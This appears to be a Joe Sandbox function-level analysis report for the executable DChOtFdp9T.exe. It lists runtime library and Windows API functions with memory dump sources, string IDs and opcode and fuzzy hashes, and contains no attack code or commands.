                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: ccb6d4e2bda4067e0443c404fd9a474edfc6b85f6f9be671b7f5248df8d782cb
                                                                                                                                                                                                                            • Instruction ID: eb012d2ca46df2bfd2c885f2f8306a9124e049fde9df221e1a15bcc34b7060f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccb6d4e2bda4067e0443c404fd9a474edfc6b85f6f9be671b7f5248df8d782cb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2111B10E0C30352FBA9A73758521B919925F5577CF380B38D93ECA6D3DEACB44183A0
                                                                                                                                                                                                                            Function 00007FF6029A5000 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                            • Opcode ID: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction ID: 0e28f3711433028e44ee642cd4df3a5257ca9fdc99f9fe737d60fdfa3b0427b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C291BD22F08B4685F7619E26D45037D3B91AF40B98FE64136DA5E873D6DEBCE8058380
                                                                                                                                                                                                                            Function 00007FF6029AEA48 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                            • Opcode ID: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction ID: 72d1e5538a15584c36a4254803a9f93df8dea58f7770aa694ef0e7c01a719815
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F818C32E0834285FB669F2B81542782EB0AF11B4CF758035DA8ED7297DFADE9419781
                                                                                                                                                                                                                            Function 00007FF60299C6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2a6de3791725ddfbc48ce0b097b49ba52726105bf73c6c3fd72ab48c7ca6517a
                                                                                                                                                                                                                            • Instruction ID: 81f093f3f65bd810a926666dd8b3d3a616c12d201433f26aca6445a47a118e9c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a6de3791725ddfbc48ce0b097b49ba52726105bf73c6c3fd72ab48c7ca6517a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13517232B196018EDB54CB1BD8446783B95EF48BACF604136EA4D87786DFBDE851C700
                                                                                                                                                                                                                            Function 00007FF60299E2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                            • Opcode ID: 4d1f17f780d541d806ff223e3e5d5e3003fb20f5d45f47d47739065b43184ee8
                                                                                                                                                                                                                            • Instruction ID: 31a13efe2735ce92e3b09208df62a3d08925c81c831a76243bb4fffaee896e2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d1f17f780d541d806ff223e3e5d5e3003fb20f5d45f47d47739065b43184ee8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 225180329082428EEB64CF1BD4443687B90FF55BA8F245136EA9C87786DFBCE460C701
                                                                                                                                                                                                                            Function 00007FF60299DF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: 28bd50d62034d744e5c29b948b97490e8974b0410da27ad0aba8bf4c0d93d456
                                                                                                                                                                                                                            • Instruction ID: 0e352785b014778ae9065b473606f02c06ee721c2575894ac5bc048d4e410f21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28bd50d62034d744e5c29b948b97490e8974b0410da27ad0aba8bf4c0d93d456
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 126162329087C585D774DB1AE4403AABBA0FB85B98F144626EBDD47B56DFBCD1A0CB00
                                                                                                                                                                                                                            Function 00007FF602992870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                            • Opcode ID: 78b83146050a42d288f23809762ffa169c69ffbcb83a56659e04ce7da0b4556a
                                                                                                                                                                                                                            • Instruction ID: 22d22f37dbf95b4db568b86249e3aa30ac7604e8e759ffc7ab027187fc3aebda
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78b83146050a42d288f23809762ffa169c69ffbcb83a56659e04ce7da0b4556a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7311C172A28B8191FB20CB06F551BA93764FF44B8CFA05135DA8C87646DFBCD615C740
                                                                                                                                                                                                                            Function 00007FF6029925F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                            • Opcode ID: 3f244dd2de3b921acfe38b69a8ed211b74921365d3241a070afb051abf77115f
                                                                                                                                                                                                                            • Instruction ID: 0d039d64eb68528d8131f0544d4a5d9092e89a71725f72e221903d3c00bc3437
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f244dd2de3b921acfe38b69a8ed211b74921365d3241a070afb051abf77115f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D811C172A28B8191FB20CB06F851BA93764FF44B8CFA05136EA8C87646DFBCD615C700
                                                                                                                                                                                                                            Function 00007FF6029AB420 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                            • Opcode ID: f368ada35fb474b2284791682290747ae7f5b6befa196106d8a71bc49c3fa083
                                                                                                                                                                                                                            • Instruction ID: 7b18981af93d470e8ca3ac1732c510d83026e223746c8fb49aa55d7768b86133
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f368ada35fb474b2284791682290747ae7f5b6befa196106d8a71bc49c3fa083
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D1BE22F08B8189E711CF6AD4502AC3BB1FB54B9CF244235DE5E97B9ADE78D516C340
                                                                                                                                                                                                                            Function 00007FF602992030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                            • Opcode ID: e42f8d3530da9c3dd641b58729eda5db52a5a8d2ed854a22cf7f5beb2a148ea9
                                                                                                                                                                                                                            • Instruction ID: 6146f5fdc2a04ff67025401e0033614987e9f93f0603353973ad171ddd3a1aee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e42f8d3530da9c3dd641b58729eda5db52a5a8d2ed854a22cf7f5beb2a148ea9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A111E921E0814246FA55976FE5442B91A51EF85BD4FA48030DE4987B8FCDBCD4D58200
                                                                                                                                                                                                                            Function 00007FF6029B499C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                            • Opcode ID: 6c402aa0fc4d9fee83df8afc093c5b3a246745bb84957b9dac3fee4e9fde805c
                                                                                                                                                                                                                            • Instruction ID: 947e59aa0ff00b7d31ccd7d94a876109dd5e4c5513df529f885daefdeeb058f9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c402aa0fc4d9fee83df8afc093c5b3a246745bb84957b9dac3fee4e9fde805c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D41F712A0838241FB669B27961137A5E90EF81BA8F345235EE5C87AD7DFBCD441D700
                                                                                                                                                                                                                            Function 00007FF6029A7E94 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A7EC6
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF60299BC15), ref: 00007FF6029A7EE4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                            • API String ID: 3580290477-4277806258
                                                                                                                                                                                                                            • Opcode ID: 064e229dd4ecab7c65acac9730b93a5d443e258722394bb41793795b182d0ad1
                                                                                                                                                                                                                            • Instruction ID: e302487437b13d2d169ae98e836b5336f8775044e293c54a5e2d5054ca72df63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 064e229dd4ecab7c65acac9730b93a5d443e258722394bb41793795b182d0ad1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20419D36E08B1295EB55DF63A4410FC6BA4FF45B98B754035EA0E87B87DEBCE5818380
                                                                                                                                                                                                                            Function 00007FF6029AF35C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                            • Opcode ID: 7e27a42496cdb6428350bd2e0a3d1e2f99c123f0217d9f4cc9ff161562cdcfaf
                                                                                                                                                                                                                            • Instruction ID: 6d6cea6df54d7a62a9c2cb80a9e413063e66e52ea0790ee102d1ac94d420378d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e27a42496cdb6428350bd2e0a3d1e2f99c123f0217d9f4cc9ff161562cdcfaf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD413A22F18B5288FB119BB2D8511BC3EB46F5479CF640035DE0DA7E86EFBDA4468394
                                                                                                                                                                                                                            Function 00007FF6029ABAB8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                            • Opcode ID: 2dfdf1345e7435bb755afa8e70579ae9363ee012d6a85a4f19ea384257b8361b
                                                                                                                                                                                                                            • Instruction ID: c4f6d1bb6b342c91491d016525a2ce22b6917faecb06cf5c6fe46b806fca8785
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dfdf1345e7435bb755afa8e70579ae9363ee012d6a85a4f19ea384257b8361b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41B222B19B8186DB20CF26E4553A96BA0FF98B98F604035EE4DC7799DF7CD441C740
                                                                                                                                                                                                                            Function 00007FF6029AE438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
